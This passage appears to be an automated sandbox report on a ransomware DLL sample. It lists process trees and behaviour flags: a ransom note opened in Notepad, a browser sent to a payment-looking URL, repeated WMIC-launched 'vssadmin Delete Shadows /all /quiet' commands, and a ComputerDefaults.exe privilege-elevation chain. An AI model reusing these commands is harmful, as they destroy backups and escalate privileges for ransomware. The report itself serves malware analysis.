memory of 3508 4840 ComputerDefaults.exe 112 PID 4840 wrote to memory of 3508 4840 ComputerDefaults.exe 112 PID 616 wrote to memory of 812 616 ComputerDefaults.exe 114 PID 616 wrote to memory of 812 616 ComputerDefaults.exe 114 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 PID 2956 wrote to memory of 4820 2956 msedge.exe 116 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1164
-
-
C:\Windows\system32\cmd.execmd /c "start http://10ac06e00ef8ba30f6aitmptmni.uscatch.club/aitmptmni^&2^&36171165^&56^&305^&2219041"2⤵
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://10ac06e00ef8ba30f6aitmptmni.uscatch.club/aitmptmni&2&36171165&56&305&22190413⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb328146f8,0x7ffb32814708,0x7ffb328147184⤵PID:4540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,17801295974742640442,8692434923455142795,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:24⤵PID:4820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,17801295974742640442,8692434923455142795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:3444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,17801295974742640442,8692434923455142795,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:84⤵PID:2016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,17801295974742640442,8692434923455142795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:14⤵PID:3244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,17801295974742640442,8692434923455142795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:14⤵PID:2096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,17801295974742640442,8692434923455142795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4484 /prefetch:14⤵PID:2296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,17801295974742640442,8692434923455142795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:14⤵PID:4508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,17801295974742640442,8692434923455142795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:14⤵PID:4868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,17801295974742640442,8692434923455142795,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:14⤵PID:2756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,17801295974742640442,8692434923455142795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4640 /prefetch:84⤵PID:832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,17801295974742640442,8692434923455142795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4640 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:4720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,17801295974742640442,8692434923455142795,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:14⤵PID:3724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,17801295974742640442,8692434923455142795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:14⤵PID:1892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,17801295974742640442,8692434923455142795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:14⤵PID:3512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,17801295974742640442,8692434923455142795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:14⤵PID:1456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,17801295974742640442,8692434923455142795,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5372 /prefetch:24⤵
- Suspicious behavior: EnumeratesProcesses
PID:4896
-
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:5112
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Modifies registry class
PID:2664 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:4036
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:64
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:4204
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:872
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:3916
-
-
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:2796 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:3496
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:2704
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:5192
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:64
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:4424
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3516 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\4f66a5b1bb80abbe07697409267d28f5_JaffaCakes118.dll,#12⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4040 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:3992
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵PID:4816
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵PID:4956
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵PID:1120
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵PID:4572
-
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:2416
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:700
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:64
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:3456
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:688
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
- Modifies registry class
PID:3656 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:4416
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:4444
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:3504
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:688
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:2748
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Modifies registry class
PID:3840 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:5484
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:5392
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:5856
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:5372
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:5884
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3932 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:3288
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:5068
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:4944
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:4000 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:4464
-
-
C:\Windows\System32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:4840
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:1768
-
-
-
C:\Windows\System32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:552
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:308
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4080
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3976 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:812
-
-
C:\Windows\System32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:2084
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:268
-
-
-
C:\Windows\System32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:688
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:5020
-
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca1⤵
- Modifies registry class
PID:2028 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:5136
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:300
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:3012
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3924 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:4816
-
-
C:\Windows\System32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:2212
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:4920
-
-
-
C:\Windows\System32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:2024
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:4460
-
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca1⤵PID:1860
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
- Checks processor information in registry
- Modifies registry class
PID:1792
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:3508
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:812
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3612
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:544
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5020
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4508
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:296
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1196
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3148
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4616 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:2480
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1932
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:3692 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:3756
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:4604
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3796
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4784 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4336
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1172
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3992
-
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:1656 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:3176
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:4072
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4328
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:308
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1768
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3940
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1524
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:2268 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:2704
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:4252
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:5068 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:1060
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1196
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1636
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1824
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:1524 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4956
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:744
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4460
-
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3612
-
